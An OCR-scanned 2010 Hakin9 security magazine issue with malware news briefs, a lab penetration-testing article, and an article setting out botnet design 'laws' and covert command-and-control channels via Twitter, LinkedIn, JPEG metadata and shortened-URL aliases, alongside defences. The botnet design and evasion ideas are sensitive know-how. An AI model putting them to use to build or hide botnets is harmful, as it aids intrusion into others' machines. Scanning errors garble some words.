Hanin9 



PRACTICAL PROTECTION 



IT SECURITY MAGAZINE 



Vol.5 No.8 
issue 8/2010(33} 
1733-7186 



MOBILE MALWARE 

- THE NEW CYBER THREAT 

ARMORING MALWARE: HIDING DATA WITHIN DATA 

BOTNET: THE SIX LAWS AND 
IMMERGING COMMAND & CONTROL VECTORS 
HACKINGJTRUST RELATIONSHIPS - PART II 

^r^K\ WEB MALWARES - PART II 
*^DE EbHIKgNIaYER-2 ATTACKS IN VOIP 

IS ANTI-VIRUS DEAD? 




Penetration Testing Training 
that will make you stand out 




Learn how much you want everyday with no expiry pressure. 
Our engaging e-learning environment is ideal if you work. 
It sets you free from long boring learning sessions. 

Penetration testing has evolved. It's time to be professionals. 

Study how to handle your pentesting project and how to report your findings 

to executives, clients or your employer 



Our certification proves your skills as a hacker and as a professional. 

Produce your penetration testing report, have it reviewed by one of our instructors, 

get recognized as a professional penetration tester. 



The fastest path 
to Professional 
Penetration Testin 



Thinking of advancing your IT Security career? 



Get Yourself Trained And Certified As A 
Penetration Tester... At Your Own Pace! 



Penetration testing is big business. 
As companies and government 
organizations go increasingly 
electronic, there is a growing demand for 
IT professionals who can evaluate the 
security of these computer systems, 
networks and suggest safeguards. 

Traditionally, training to become a 
certified "penetration tester" or "ethical 
hacker" has been a long, drawn-out 
process. Most certifications assume that 
candidates already have some form of 
networking or programming background, 
which makes it difficult for beginners to 
get started. Others require the physical 
attendance of training classes conducted 
only at certain locations. In all, the time 
and money spent in obtaining such a 
certification can be costly. 

A new breed of penetration testing 
courses in the market looks set to change 
all this. One such course is "Penetration 
Testing Pro" offered by eLeamSecurity, 
an Italian IT security firm headed by 
Armando Romeo, who is also founder of 
the respected Hackers Center Web 
Portal, 

His real world credentials aside, Armando 
hopes "Penetration Testing Pro" will 
change the way such training is 
conducted in the industry. "We set out to 
design the most comprehensive training 
course for IT professionals and anyone 
who cannot take time off to attend 
physical lessons. Our course allows them 
to learn the latest intrusion methods at 
their own pace, through over 1600 
interactive e-learning slides and video 
lessons. There's no longer a need to sit 
through hours of boring classes/' he says, 

A CEH AND LPT KILLER? 

Industry experts seem to agree with his 
methodology, too. Jason Haddix, 
columnist at EthicalHacker.net, feels the 
course has great potential, 

"I kept thinking - this is what the CEH / 
LPT should have been - and I am 
delighted to say that if students can 
master the topics and techniques in 
eLearn Security's Penetration Testing Pro, 
they should be well on their way to being 
an accomplished pentester," he writes. 

CEH and LPT refer to Certified Ethical 
Hacker and Licensed Penetration Tester 



respectively, both the gold standards for 
penetration testing in the industry. 

Another veteran industry insider, Timothy 
Everson from Novell, who holds multiple 
certifications such as MCNE, CDE, CLE, 
CCNA on top of the CEH says, "For 
anyone who is budget constrained, I d 
say, with total confidence, that the value 
of eLearnSecurity training meets or 
exceeds the value of many of the other 
programs available. If one truly desires to 
learn the technical aspects of IT security, 
it's a certification course well worth the 
time and investment." 

Nathan Suri, an Information Security 
Architect who holds CJSSP, SCJP and 
CSSLP certifications agrees, The 
combination of slides, video, hands-on 
examples with the lab to practice some of 
the techniques makes it very effective, I 
like the balance of theory and practice." 

REAL WORLD APPROACH USED 
BY PENTESTERS 

Perhaps it is this real world, raw approach 
to teaching penetration testing that has 
made this course so popular. Besides 
Armando, the other co-authors include 
Brett Arion, a U.S IT Security specialist, 
Nitin and Vipin Kumar, Nitin and Vipin, 
both from India rose to fame after 
authoring the acclaimed "Windows Vista 
Bootkif and "Windows 7 Bootkif 
researches at BlackHat, 

HOW TO BECOME A HIGHLY 
SOUGHT AFTER PENTESTER 

Armando explains, "Just because 
someone is certified does not make him a 
good penetration tester Penetration 
testing is part art and science. A tester 
needs to have experience to know which 
vulnerabilities to look out for He also 
needs to give workable, business-minded 
suggestions to his clients for countering 
these exploits 1 ' 

Given the depth of knowledge required, 
can someone with no prior experience still 
be trained to become a good penetration 
tester? 



"Absolutely, The training aspect is key. 
We start with our e-learning slides and 
videos which explain every aspect of web 
application, system and network security 
testing. 



We then follow up with labs and practical 
exercises. Instead of a multiple 
choice certification exam, ours is an 
actual penetration testing exercise. 
We are not just interested in testing 
theoretical knowledge. Candidates are 
required to conduct their own penetration 
tests on a given target and submit an 
actual test report for grading.'' 

These rigorous requirements, Armando 
insists, are needed to ensure that the 
course is as realistic as possible. "Every 
student should have the confidence to 
conduct actual penetration testing in a 
commercial or mission critical setting," 

IS THIS FOR YOU? 

If you are looking to further your IT career, 
or even make a transition to the lucrative 
field of Penetration testing, these new 
breed of courses such as "Penetration 
Testing Pro" may be a great choice. 
Not only do they cost a mere fraction of 
what other certifications ask for, it is a 
great way to get up to speed with the 
latest penetration testing methods by 
learning from actual hackers and 
understanding their psychology. Learning 
at one's own pace without having to set 
time aside for regular lessons is also a big 
draw. 

At the end of the day, does Armando 
hope that his course will replace the CEH 
as the de facto certification in the 
industry? 

"Definitely not," he says with a laugh. 'We 
provide the technical training and flexibility 
that the CEH does not In fact, students 
who take our course as a starting point 
will also acquire most of the knowledge 
needed to pass other certifications such 
as CEH and LPT, This means they'll find it 
much easier later on to pass their 
certifications as well.' 1 

For more information on eLearn Security's 
Penetration Testing Pro course, visit 

http://www.eLearnSecurity.com . 
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Dear Readers, 

We decided to devote this issue to malware. As you all know 
malicious software is one of the biggest concern and is definitely 
on the top of the security issues list nowadays. 

Malware easily infects your computers - it doesn't matter if 
you are visiting a website, use devices like USB, download files, 
open an attachment of an email etc. We are exposed to this type 
of danger all the time. The most serious threat is that malware is 
very often a Trojan and our personal information can be stolen 
easily. That is why it is very important to stay up to date with recent 
knowledge about them, so that you know how to protect your 
computers. 

This issue is a perfect fit for those of you, who would like to 
be more familiar with malicious software. In the attack section 
you will find the second part of the Web Malware article from a 
previous issue by Rajdeep Chakraborty. Another must-read is 
a paper by Israel Torres- Armoring Malware: Hiding Data within 
Data. The third article also discussing malware is written by our 
ID fraud expert, Julian Evans and it is titled: Mobile Malware - the 
new cyber threat. Another paper discussing malware problem in 
details is written by our regular contributor Gary S. Miliefsky and 
is titled: Is Antivirus Dead? The answer is YES. Here's why... 

I am sure that after reading the information in this magazine, 
your knowledge about malicious software will be much deeper 
and you will be more careful and malware-aware! 

Enjoy! jP 



Karolina Lesinska 
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Firefox Rogue Add-On 
Collecting Passwords 

Mozilla has issued a warning to 
it's users that a Firefox add-on 
available from their official Mozilla 
Add-Ons website has secretly been 
sending users' stolen passwords to 
a remote location. Mozilla Sniffer 
was uploaded onto Mozilla Add-On 
website on June 6th, but was found 
to have malicious code that sent the 
contents of a website login form to a 
remote location. 

Source: ID Theft Protect 



USB Malware Threat to 
Windows Shortcuts 

Anti-virus researchers have 
discovered a new strain of malicious 
software that spreads via USB 
drives and takes advantage of a 
previously unknown vulnerability in 
the way Microsoft Windows handles 
.Ink or shortcut files. Belarus-based 
VirusBlokAda discovered malware 
that includes rootkit functionality to 
hide the malware, and the rootkit 
drivers appear to be digitally 
signed by Realtek Semiconductor, 
a legitimate hi-tech company. In 
a further wrinkle, an independent 
researcher Frank Boldewin found 
that the complexity and stealth of 
this malware may be due to the fact 
that it is targeting SCADA systems, 
or those designed for controlling 
large, complex and distributed 
control networks, such as those 
used at power and manufacturing 
plants. 

Source: ID Theft Protect 



ATM's hacked at BlackHat 

BlackHat 2010 has brought a 
number of interesting talks on 
the table, as every year. Barnaby 
Jack, however, has surely made 
the show of the BlackHat: with the 
talk Jackpotting Automated Teller 
Machines he has demonstrated 
how to remotely exploit ATM's and 
withdraw money. The talk, scheduled 
for BlackHat 2009, had been pulled 
for the threat level it could pose to 



ATM's vendor (and most of all their 
users) that, according to Barnaby, 
are still vulnerable one year later. 
This year Barnaby has brought 
two new tools, who he has custom 
coded: Scrooge and Dilinger. While 
the first is a rootkit capable of acting 
as a malicious ATM firmware and 
has been demonstrated on stage 
by means of a USB stick, the latter 
is the tool that allows for the remote 
exploitation. The development of 
the malicious firmware, replacing 
the original through the USB stick, 
has been made possible thanks 
to months of reverse engineering 
on ATM machines purchased by 
Barnaby and curiously kept in a 
room at his house. 

The replacement is made pos- 
sible thanks to easily available 
master keys, used by maintenance 
technicians, and the absence of 
any integrity check or signature on 
the software installed on the ATM. 
The most scary and impactful part 
of Jack's research is the possibility 
of attacking the ATM's over internet: 
it is possible to install the new 
malicious firmware by reaching the 
ATM modem through its dialing 
number. 

Source: Armando Romeo, 
www, elearnsecurity. com 

Android phones hit by 
malicious wallpapers 

Researchers from the AppGenome 
project, whose goal is to make people 
aware of the threats involved in 
mobile applications, have uncovered 
a new wave of at least suspicious 
applications for Android coming 
in the form of wallpapers. These 
applications gather sensitive data and 
send it back to server imnet.us. The 
information sent in the clear includes 
phone number, subscriber id and 
more. 

Examined wallpapers were 
authored by jackeey, wallpaper, 
callmejack and lceskYsl@1sters! 
and have been downloaded between 
1 and 4 million times. While the 
use made of this information by 



the wallpapers developer is still 
unknown, this should make it clear 
that even the most innocuous mobile 
application can be used as a data- 
stealer. 

Source: Armando Romeo, 
www. elearnsecurity. com 

UK to stick with IE6 to keep 
costs low 

IE 6 has been the cause for the 
Aurora and for a number of other, 
then dubbed APT - Advanced 
Persistent Threat, successful attacks 
to corporations and governments 
resulting in high profile espionage and 
secrets theft. As soon as the Aurora 
exploit was published in end 2009, 
German and French governments 
immediately dismissed the use of 
the browser in favor of the more, 
relatively, secure Internet Explorer 
8. As surprising as it seems, while 
whole Europe dumps support to the 9 
years old vulnerable browser, Prime 
minister Brown first, and new Prime 
minister Cameron now, decided 
to stick with IE6 because of the 
annexed costs in having a full review 
of all the web applications used for 
UK internal public administration and 
developed for IE6. 

UK counts over 300,000 desktops 
worldwide in public administration 
offices as well as armed forces, 
most of them using IE 6. The 
decision seems to be risk and cost 
based although very unpopular 
since petitions to dismiss IE6 came 
to Number 10 Downing Street in 
early 2010 from a number of top 
names in the industry. 

Source: Armando Romeo, 
www, elearnsecurity. com 

Root DNS Server secured 
with DNSSEC 

While BlackHat 201 0 targeted ATM's 
and SSL, BlackHat 2008 dealt 
with the holes in the DNS making 
virtually all DNS Servers vulnerable 
to cache poisoning attacks. Dan 
Kaminsky, the researcher behind 
the attacks to DNS, since the early 
days had worked hard, with a 
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number of DNS Servers vendors, 
to temporarily patch the vulnerable 
implementations. After over two 
years from that BlackHat, the 
upgrade to what is believed to be 
the long term solution to those 
issue has been ported to the Root 
DNS Servers. ICANN, with the 
collaboration of companies like 
VeriSign has rolled out DNSSEC on 
all the 13 root servers of the Internet. 
Works had started in January 2010 
when server L-root, had been the 
first to implement the protocol that 
should make the internet and many 
of the services running on it more 
secure. Until the next attack. 

Source: Armando Romeo, 
www, elearnsecurity. com 

Firefox 4 to bring more 
security 

Mozilla foundation has made 
security one of their primary goals 
since the beginning. 

According to Secunia compre- 
hensive advisories database, Firefox 
3.0.x series has suffered 24 total 
vulnerabilities, 14 in 2009 alone, 
86% of which were High impact 
vulnerability. 

The picture is clear: Firefox needs 
more security. 

At BlackHat 2010, Mozilla 
representatives announced their plans 
for the new release, already available 
in beta: Firefox 4. Beside the support 
for HTML5, that we believe will bring 
to a number of new attacking vectors, 
and the new Javascript engine, much 
needed, fixing of old vulnerabilities will 
happen. 

The first to be patched will be 
the CSS sniffing history attack 
that allowed Jeremiah Grossman 
and others, some years ago, to 
demonstrate how easy it was to 
guess what websites the user had 
visited from the colors of the links to 
these website in a web page. 

A completely new and breaking 
through feature is the possibility for 
the developer to determine what 
content is supposed to be contained 
in a page and what content should 



be treated as injection. This will 
help determining XSS attacks and 
mitigating their effects. In order 
to keep backward compatibility, 
developers will have to opt-in for 
this feature. 

Source: Armando Romeo, 
www, elearnsecurity. com 

GSM hacking tools released 

Summer 2010 has seen the raise of 
threat level to GSM communication: 
the most widespread mobile 
communication protocol that we all 
use in our mobile phones. 

A new cracking tool, called Kraken 
by its creator Frank Stevenson, 
has been released with the goal of 
providing an easy to use tool for 
cracking GSM intercepts. The tools 
is capable of cracking the A5/1 
encryption algorithm much faster than 
tools released earlier this year, thanks 
to future support for GPU processing 
and a wider rainbow table. 

In conjunction with another open 
source tool dubbed Airprobe and 
a computer programmable radio, 
costing around $1000, virtually 
any SMS and voice call can be 
decrypted. 

GSM Telco carriers were 
expected to release a patch to the 
algorithms in use, at least 2 years 
ago but most of them have yet to 
do so, according to cryptography 
expert Karsten Nohl who in 2009 
had announced his plans to use 
distributed computing to knock 
down the time required to crack A5/ 
1 encrypted communications. Now 
that techniques have been polished, 
tools are freely available and 
equipment is relatively affordable, 
it's time for AT&T and alike to act. 

Source: Armando Romeo, 
www. elearnsecurity. com 

Adobe Reader adds 
sandbox security 

Adobe announced last month (July 
2010) that the next generation of its 
popular reader PDF Viewer will also 
include sandboxing technology. The 
sandboxing technology will be used 



in the Windows upgrade to Reader 
(Version 10) before the end of 2010. 

The sandboxing technology stops 
malicious PDF code from successfully 
writing to a PC. Any malicious code 
will ONLY be installed in the sandbox 
and not on the main operating 
system (your main hard drive). For 
an attack to succeed in a sandboxed 
environment, there would have to be 
two malicious files - one that writes 
and the other that allows the malware 
to work outside of the sandbox. 

Most sandboxing applications will 
allow you to control what programs 
are executed as well as sandbox 
your web browsing. Sandboxing is 
currently used with Internet Explorer 
7 and Internet Explorer 8 as well as 
the new Microsoft Office 2010. 

Adobe have also indicated that they 
will extend the read-only activities in a 
later release. Adobe Reader currently 
provides a plug-in for IE7 and IE8's 
Protected Mode (which is a sandbox) 
as well as Google Chrome's.The 
sandboxing technology will be turned 
on by default, will be be named as 
Protected Mode, the same term used 
by Microsoft in IE7 and IE8. 

Source: ID Theft Protect 



Google Android wallpaper 
malware surfaces 

It's not porn, but it is still something 
Apple is probably going to try to make 
hay out of. At the always interesting 
Black Hat security conference in Las 
Vegas last month, Kevin MaHaffey, 
chief technology officer at mobile 
security Lookout noted a group of 
Android wallpaper apps by the same 
developer which are stealing data 
from users that install them. 

The innocent looking wallpaper 
apps collect your phone's SIM 
card number, browsing history, text 
messages, subscriber identification, 
and even your voice mail password. 
It sends the data to a web site, 
xxx.imnet.us. That site is apparently 
owned by someone in Shenzhen, 
China (ironically, where a lot of 
Apple products are assembled). 

Source: ID Theft Protect 
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Botnet: 



The Six Laws And Immerging Command & Control Vectors 

New BotNet communication vectors are emerging. The 
industry is not prepared. For the next 20 years, BotNets will 
be what viruses were for the last 20. 



What you will learn... What you should know... 

• BotNet design elements • Ethernet communications 

• New BotNet communication vectors (advanced) • Network security & monitoring 

• Programs that can tell you if you are a part of a BotNet • BotNet architecture 



Define: Botnet 

A BotNet is typically installed via. a drive-by-download. 
A BotNet is a software program (agent) that is installed 
on a host. Once installed it runs automatically and 
independently of any other program. Agents typically 
receive instructions from a BotMaster and are used for 
a variety of malicious purposes. 

Define: Drive-by-download 

A Drive-By-Download refers to a download that takes 
place without the permission (or understanding) of 
a user. 

In The News 

Recently in the news a band of hackers were 
discovered to have in their possession tens of 
thousands of user names and passwords. The 
proposed attack vector was spam. Various emails and 
posts on social networking sites would lead victims to 
click on a link... Game over. In most of these stories, 
unless the authors hide their tracks well, they are 
ultimately captured. 

However, take for example Kneber BotNet. 
A new form of malware that has infected over 100,000 
computer systems around the world. The goal of this 
particular piece of malware is to steal login credentials 
for email systems and banking credentials/logins. 
Kneber is a ZeuS Trojan BotNet. Kneber happens to 
be excellent at stealing private information stored on 



local computers. In most cases, systems infected with 
Kneber also have the Waledac Trojan worm which is 
used to create email spam BotNets. The main target is 
Windows computers. 

Botnet 

It's a growing concern that novices and experts alike 
have access to professional grade tools for creating 
and managing BotNets. Not only do they have access 
to the tools but they are laying digital traps all over 
the Internet. The media has focused mainly on the 
tools. When victims land on these infected websites, 
a third party is then able to take full control of the host 
(Windows PC). These newly infected PC's are called 
Bots and are enrolled in BotNets. Once a Bot infects 
your PC, it calls out to its command-and-control (C2C) 
server for instructions. 

These BotNets are then maintained and managed 
like any other network. Frequently the media tells us 
that BotNets are used for denial of service (DDoS) 
attacks, this is not always the case, while some are 
indeed built to send spam, some work as HTTP 
servers for adult content, some are proxybots (yes, 
a Bot that install sock4/5 on your machine), and other 
are used for distributed computing such as cracking 
password. 

OVER THE NEXT 20 YEARS BOTNETS WILL BE 
WHAT VIRUSES WERE FOR THE LAST 20 YEARS 
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BOTNET: THE SIX LAWS AND IMMERGING COMMAND & CONTROL VECTORS 



The 6 Laws & Botnet Design 

What is good BotNet design? What qualifies as a good 
BotNet? What are the common characteristics that all 
BotNets should have in common? I've spent some time 
thinking about this and I've tried to boil them all down 
into THE 6 LAWS OF THE BOTNET Thoughts around 
design, process, existence, and operation. 

Law 1 : The Botnet Must Know Its Overall Goal, 
Objective And Operational Environment 

The BotNet needs to know itself. It needs to 
understand the overall goal and objective set for 
itself by its designers and creators. It must know its 
environment and the context surrounding its activities 
and adapt to it. 

Law 2: The Botnet Must Perform Installation, 
Configuration, And Self Optimization Functions 
Without Human Intervention 

It must perform its installation and configuration 
without human intervention. It must be able to run self 
optimization functions as needed or schedule them so 
that it has the capability to optimize its operations and 
tasks. 

Law 3: 

The Botnet Must Implement Self Healing 
Functions 

The BotNet must have the capability to implement 
self healing functions. If something breaks, it must be 
able to assess the issue and overcome the issue. The 
application needs situational health awareness so if 
something breaks, it should be able to overcome these 
issues and survive in the network. Scenarios where 
various elements of the BotNet will jump networks 
and platforms to heal because statistically it will have 
a higher chance of self healing without detection on one 
platform (cellphone) versus another (student laptop) 
seem plausible. 

Law 4: The Botnet Must Self Protect 

The virtual world is no less dangerous then the physical 
one so the BotNet must be able to do some self 
protection. First identify if there are abnormal situations 
and then act on it. Think flooding ports, temporary 
cpu/memory starvation, jamming/blocking known A/V 
update paths/route/mechanism/etc. 

Law 5: 

The Botnet Must Be Based On Standards And 
Have Interoprability Within All Known Digital 
Devices 

It can't exist in a hermetic environment. It requires 
standards and interoperability within all digital 
devices. 



Law 6: 

The Botnet Must Anticipate, Optimize, and 
Obtain Resources 

It must anticipate, optimize, and get resources. 
Back In The Office 

Today network administrators, engineers, and 
managers are working hard to combat this growing 
threat - The BotNet. They are trying to understand 
the architecture & scope, learn the detection methods, 
nature of the contagion, propagation vectors, and how 
to prevent them. Meanwhile inside the corporation: 
Directors, department heads, and those with 
budgetary discretion are allocating more and more 
money - it's not working. Meanwhile the CEO's, board 
members, and advisors are starting to ask the hard 
questions about this peculiar line item in the budget 
that continues to grow unabated. Make no mistake, 
BotNets are here to stay. 

Class 777: Advanced Placement Class (W/lab) 

Let's take a look at what's going on at the very edge 
of the envelope - the tail of the bell curve if you 
will. What research projects are the smart people 
working on? Take for example the work being done by 
luminaries Tom Eston, Robert Wood, Kevin Johnson, 
and Mubix? 

Kreiosc2 

Let's talk about the latest version of Robin Wood's 
KreiosC2. He and others like him are paving the way 
for new BotNet communication vectors. The KreiosC2 
POC concept Bot explores the possibilities of using 
different communication vectors as the command and 
control channel. 

What has the Internet all a buzz is that the BotNet 
administrator (bSysOp? BotOp? I digress...) can use 
a Twitter feed to perform an action. The most recent 
version (v3) was released at ShmooCon 2010 as part 
of the Social Zombies II, Your friends need more brains 
talk by Tom Estron, Kevin Johnson and Robin Wood. 

C2c& Social Media: 
Forward Vectoring W/ Twitter 

The idea is that most companies now know how to 
block IRC from the internal network. Fine. However they 
are not blocking HTTP or HTML. So what part of HTTP 
are they using? 

Botnet Management 
Has Evolved Beyond Ire 

Why should you use something else to manage 
a BotNet? IRC is accessible and available! The reason 
is that most security professionals associate negative 
things with IRC and frequently block it but it's not 
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outside the realm of possibility (in a normal operational 
environment) to expect a business machine to be active 
on Twitter, Linkedln, and transfer JPEGS- all to and 
from random servers. 

New Vector: Twitter 

The administrator can use Twitter, exclusively to 
manage the BotNet. A commander would send a Tweet 
out that basically said Bots, do this and the bots would 
then listen to the command issued. 

Note 

You have probably read about early attempts at this 
that were covered in the media which were based on 
early versions and concepts that were not optimized 
and stealthy. 

Encryption 

Another way to send commands are to base 64 encode 
them and then put them on twitter. How it works: you 
would be on Twitter and following someone that looks 
like a BotNet Administrator a BotMaster if you will. 
You can even choose what language you want the 
communication to be done in. 

The default syntax is very basic. 

SYNTAX: colon : , cmd, and then whatever you want 
the Bot to do, for example: 

• Ping something, 

• Execute a command, or 

• Download a file 

All done over Twitter. 

It would be easy to block that communication; 
the smart money would say change the language! 
Languages will end up being a snap-in module. You can 
write/create/drop in a module that does it in English. 

So instead of saying: 

SYNTAX ":CMD PING 10.0.0.1" 

You could say Look at this amazing address 10.0.0.1 
and it will look like a normal twitter post because it's 
in a more English vernacular (natural expression). The 
more effort you put into the language the easier you 
can make it fit in to common tweet traffic. Intrusion 
Detection Systems (IDS) will find this challenging to 
detect and Intrusion Prevention Systems will need 
modification to stop it. 

New Vector: Linkedin 

Newer platforms have integrated/utilized Linkedln. 
How can a BotNet be used on Linked In? Linkedln 
recently added an Application Programming Interface 
(API) that allows you to read any field in a Linkedln 
users profile and read/write the status field on your 



profile. People are posting BotNet commands as 
status updates on profiles. 

New Vector: Pictures 

A new BotNet command and control method utilizes 
a JPEG. While this has already been tried, previous 
attempts just used a JPEG header, just the header 
followed by the commands, but when you take a closer 
look at the file, in a viewer perhaps - you were not able 
to see the picture. Fail. It's was garbled because there 
is no body to it. Most people don't know that JPEGS 
allow metadata! 

TIP 

JPEG's allow metadata so keep the valid JPEG and 
insert the data into a Metadata filed. 

The Bot then just needs to pull the same JPEG over 
and over again to keep things updated. As frequently 
or infrequently as needed. You could say, here are 25 
JPEGS, go grab all of them and the activity is not going 
to trip any IDS, or any other perimeter defense for that 
matter. 

New Vector: Tiny Url 

Going over a TINY URL type service. Services like 
IS.GD, and Bit.LY will also work fine. How it works: Tiny 
URL allows you to specify the alias that's being shot out 
and that's why it's good. Keeping BotNets up to date will 
come down to modular design and utilization of updated 
modules. 

The way the alias is created is based on a (timestamp 
+ keyword) hashed together; a number of them are 
created per timeslot. 

Every 10 minutes you can have up to 5 valid 
aliases. If the BotNet administrator wants to send 
out a command; he generates that list of hashes by 
aliases and asks if the first one available? If it is, he 
says please shrink me this URL, using this alias. The 
URL is XYZCorp.COM/ping 10.0.0.1 (basic query 
string) so what the Bot does then every 10 min is 
it generate this same list because it knows that the 
algorithms for it go to Tiny.UR and says does this alias 
exist? YES. Ok, What URL is that shrinking? Gets the 
URL. Pattern matches it. Is it a valid command? Yes, 
and executes it. Done. 

It works out the hash and says to tiny.url, give me 
the url that has been shortened by this alias. By using 
a regular expression to say, does this look like a valid 
command that I can run? However, today, nothing stops 
someone else from stealing your Bots. What you could 
do for that is add hashes or encryption. 

Adaptation & Improvisation 

Is it a frame work? Can it be extended? Will it blend? 
RSS or ADAM and do all that? Yes. The languages and 
control channels in KreiosC2 are modular in design. 
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BOTNET: THE SIX LAWS AND IMMERGING COMMAND & CONTROL VECTORS 



On the 'Net 

Kre i osc2 www. digininja. org/kreiosc2 
Watch the BBC click episode 
Videos www.watchguard.com/education/videos.asp 
Website www.5ecuritytube.net 
Simple IRC bot www.osix.net/modules/articlenid-7S0 
Conficker Paper www.mtc.sri.com/Conficker/addendumC/ 
URL TINY URL www.tinyurl.com 
URL IS GD www.is.gd 
URL Bit LY www.bit.ly 

Microsoft Removal Tool www.microsoft.com/security/ 
malwareremove/default.aspx 
BotHunter www.bothunter.net 
hakS.org 

Jobs www.Not5oJankJobs.com 



When it is up and running, there is a change language 
and change channel command. That command 
basically says, ok Bots, use this language instead. 

The Bot then goes to a website, downloads the 
language file and changes to that language. So as soon 
as you feel the network is about to be compromised, 
you can move on to the next social network. 

Example 

Let's say you are encrypted on Twitter, and you realized 
that it's being noticed, you can now move to English 
on Linkedln, and then you can move somewhere else, 
upload JPEGS to Photobucket, etc. 

Protection Options 

Clearly all of these new vectors, if used maliciously, can 
put the national infrastructure at risk. What options are 
available for protecting hosts and networks? 

Options: Airwalls 

A duplicate system for every electronic system and 
all systems need to mirror a paper system. Systems 
and networks that are physically airwalled from other 
systems are the solution. This is an old solution. 
A complete solution will require airwalling at every 
level of the OSI model up to and including the physical 
communication lines. 

Options Sneakernet 

A throw back term referred to a time when people would 
walk over to hand you a floppy disk (or) a term used to 
make fun of someone's lousy network. Regardless, we 
need to have some type of redundancy in out systems. 
A new designation [P] will be utilized to note systems 
that have a paper equivalent. 

TIP 

Global stock exchanges, banks, and other financial 
institutions should create mirror processes and 
communications plans that utilize paper only. 

www.hakin9.org/en 



Options: Deep Packet Inspection 

We have arrived at the day when every packet that 
traverses the Internet requires deep level packet 
inspection. This will require high speed hardware and 
software to evaluate every packet. How will I achieve 
that if my core routing/switching hardware has a low 
fixed speed backplane? Also, evaluation of the packet 
will entail some type of Intrusion Detection and Intrusion 
Prevention analysis ultimately utilizing null routes and 
various other blocking mechanisms. 

Botnet Detection 

At the end of the day, communications in and out of 
a host (frequently in the form of a flood) helps anti- 
malware applications detect a known Bot. These 
communications give clues to how big the BotNet is. 

Fact 

Antivirus software can't keep up with the rapid 
developments of BotNets and the growing number of 
threats. 

Some relief is available however, Microsoft provides 
a free Malicious Software Removal Tool. Proactive 
options are also available. BotHunter is a fantastic 
program from SRI International that works with Unix, 
Linux, Mac OS, Windows XP, and Vista. BotHunter 
listens passively to Internet traffic through your machine 
and keeps a log of data exchanges that typically occur 
when a PC is infected with malware. 

Free Joke 

A "friend" of told me that the only way in the future to 
confirm a computer was not part of a BotNet was to 
look for the apple logo somewhere on the case. I replied 
Hello? Can you hear me now? Hello? Hello? Can you 
hear me now? 
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ATTACK 

Hacking Trust Relationships 

Part II 

This is the second article in a series of six that covers the 
topic of hacking trust relationships. This article focuses 
specifically on Vulnerability Identification against a target 
system, in order to identify and exploit potential trust 
relationships. 



What you will learn... 

• How to recognize trust relationships that can be exploited 

• Why it is critical to verify findings using multiple hacker tools 



What you should know... 

• How systems establish trust relationships between users and 
remote applications 

• Inner-workings of Linux systems, including configuration and 
boot-up 

• Traditional hacking tools 

• How to set up a hacking lab to recreate the scenario 



The first article in this series appeared in the 3/ 
2010 edition of Hakin9 magazine, and covered 
Information Gathering. Readers should refresh 
themselves with the previous article, in order to continue 
their understanding of hacking trust relationships. 

Introduction 

In our previous article on Hacking Trust Relationships, 
we stepped through the Information Gathering phase 
of our project, which uses the Hakin9-v1.iso LiveCD 
available at http://heorot.net/hakin9 (which contains 
both the ISO file and a VMX file for those who want to 
use virtualization software). The next step, according 
to published methodologies is to take our gathered 
information and see if we can find any vulnerabilities that 
might be exploited. After we complete our vulnerability 
verification step, we can then move into Vulnerability 
Verification (which will be covered in the next article in 
this series). 

Trust Relationships - An Refresher 

In the first article in this series, we examined what 
a trust relationship was; we will quickly go over the 
definition again, so that anyone who has forgotten 
will know what we are trying to achieve. In the most 
generic term, trust relationships involve increased 
levels of access between two entities. The level of trust 
can vary, but exists to provide improved functionality 
and communication between the two entities. The 



interesting thing about trust relationships is that after 
they have been exploited, it is difficult for system and 
network administrators to detect malicious activity. 

Some of the examples we provided in the last article 
included: 

• Web Servers - Web site administrators set up 
the server so that we have access to their web 
application, which serves us their web pages. Trust 
may also extend to forms on the page, documents 
provided, ability to post data, and so on. 

• Login Accounts - Access to the inner-workings 
of a computer through the use of usernames and 
passwords is another example. Systems are set up 
to allow users and remote applications to connect 
to the system in order to access services. 

• System-to-System - Sometimes, to reduce the 
risk of malicious attacks, administrators will set up 
firewall rules and virtual networks that limits access 
to only a handful of systems. 

Hacking trust relationships requires a different 
approach than hacking misconfigurations or other 
vulnerabilities. When dealing with trust relationships, 
the penetration test engineer has to assume the guise 
of someone (or something) else, and impersonate 
their actions exactly. In this article, we will assume 
a guise and see what we can obtain by conducting 
Vulnerability Identification. 
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Information Gathering (Finishing Up) 

As a recap from the previous article, we discovered the 
following information about our target system: 
Our target system is located at 192.168.2.201 
The following ports have been identified: 



21/tcp 

FTP - vsftpd version 2.04 
Anonymous access available 
Contained multiple text files 
22/tcp 

SSH - PenSSH version 4.3 (protocol 1.99) 
Server supports SSHvl 
Numerous public keys are available 
631 /tap 

IPP-CUPS version 1.1 
6666/tcp 

Unknown (perhaps IRC?) 
Shows up intermittently 
13782/tcp 

Unknown (perhaps netbackup?) 
Shows up intermittently 
Operation System Information 
• Linux version 2.6.13 - 2.6.24 



We will continue to use the same system and network 
configuration as used last time, which can be seen in 
Figure 1. Our attack platform is a system loaded with 
BackTrack, so that we can access any number of 
hacking tools, depending on our findings (of course, 
if this was a real penetration test, we would not use 
BackTrack - rather, we would stand up our own attack 
platform ourselves, manually installing those tools that 
we need, so we keep our risk exposure to a minimum 
and increase our awareness of how each tool is 
configured. The last thing we need is to have too many 
applications on our system; applications that were are 
unable to verify the underlying code since they were 
compiled and installed in advance by a third party). 

Regarding the network, the router has been configured 
to work in the 192.168.2.0-255 range, which will allow 
our attack platform (192.168.2.10) to communicate 
directly to the target victim server (192.168.2.101). 



IPAdreess: 192.168.2.1 





Attack Platform 
(BackTrack) 

IP: 192.168.2.10 

Figure 1. Lab Network Configuration 



Hakin9-v1.ISO 
IP: 192.168.2.101 



At the end of the previous article, I provided some 
homework for readers, which was: 

• Identify all available services running on the target 
system. This includes whatever is on port 13782 
and port 6666 

• Verify version information of all services running on 
the target system 

• Verify the Operating System and kernel version of 
the target system 

Before we move into the discussion of Vulnerability 
identification, we will need to resolve these remaining 
issues. We will start with the first task, which is to 
identify all available services, especially port 13782 
and 6666. To recreate our findings from the previous 
article, we can take a look at Figure 2, which shows 
the steps we took to demonstrate the intermittent 
access on these two particular ports. 

To explain the behavior we are looking at in words, we 
have the following situation: 

• We scan ports 6666 and 13782 

• Port 6666 is closed 

• Port 13782 is open 

• We connect to the open port (13782) 

• We scan ports 6666 and 13782 

• Port 6666 is open 

• Port 13782 is closed 

So what happens if we connect to port 6666, now that 
it is open? In Figure 3, we see that these two ports 
switch states again. It seems that these two ports are 
somehow programmatically connected - how exactly, 
we cannot state yet. 

We obviously have some additional information 
gathering to do; specifically to find out what applications 



